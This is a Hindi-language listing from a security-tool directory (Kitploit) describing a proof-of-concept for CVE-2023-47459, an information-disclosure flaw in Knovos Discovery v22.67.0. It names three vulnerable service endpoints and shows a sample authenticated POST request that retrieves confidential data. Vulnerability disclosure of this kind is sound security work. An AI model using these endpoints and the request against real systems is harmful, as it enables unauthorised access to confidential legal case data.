Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-47459 — CVE-2023-47459 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Knovos Discovery v22.67.0 में एक सूचना प्रकटीकरण भेद्यता है, जो क्राफ्टेड HTTP अनुरोधों के माध्यम से गोपनीय डेटा तक दूरस्थ पहुंच प्रदर्शित करता है। | Kitploit
उपकरण/GitHubGitHub/aleksey-vi/cve-2023-47459
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubaleksey-vi/cve-2023-47459

CVE-2023-47459

CVE-2023-47459 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Knovos Discovery v22.67.0 में एक सूचना प्रकटीकरण भेद्यता है, जो क्राफ्टेड HTTP अनुरोधों के माध्यम से गोपनीय डेटा तक दूरस्थ पहुंच प्रदर्शित करता है।

रिपॉजिटरी देखें
12 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-47459

विवरण

Knovos Discovery v.22.67.0 में एक भेद्यता पाई गई है जो किसी दूरस्थ हमलावर को इन घटकों का उपयोग करके गोपनीय जानकारी तक पहुँचने की अनुमति देती है:
/DiscoveryReview/Service/CaseManagement.svc/GetProductSiteName, /DiscoveryReview/Service/WorkProduct.svc/BindRelatedDocumentsInformation और /DiscoveryProcess/Service/Admin.svc/getReviewIdForReport।

भेद्यता प्रकार

स्टैक ट्रेस / सूचना प्रकटीकरण

उत्पाद का विक्रेता

Knovos Discovery

प्रभावित उत्पाद कोड बेस

Version 22.67.0 - Version 22.67.0

प्रभावित घटक

/DiscoveryReview/Service/CaseManagement.svc/GetProductSiteName /DiscoveryReview/Service/WorkProduct.svc/BindRelatedDocumentsInformation /DiscoveryProcess/Service/Admin.svc/getReviewIdForReport

हमले का प्रकार

दूरस्थ

प्रभाव कोड निष्पादन

true

प्रभाव सूचना प्रकटीकरण

true

खोजकर्ता

  • Aleksey Vistorobskiy

हमले के वेक्टर

अधिकृत उपयोगकर्ता

POST /DiscoveryReview/Service/WorkProduct.svc/BindRelatedDocumentsInformation HTTP/1.1
Host: vuln_host
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 17
Connection: close

{
	"Id": id
}

संदर्भ

  • https://www.knovos.com/
  • https://github.com/aleksey-vi/CVE-2023-47459
टूल डाउनलोड करें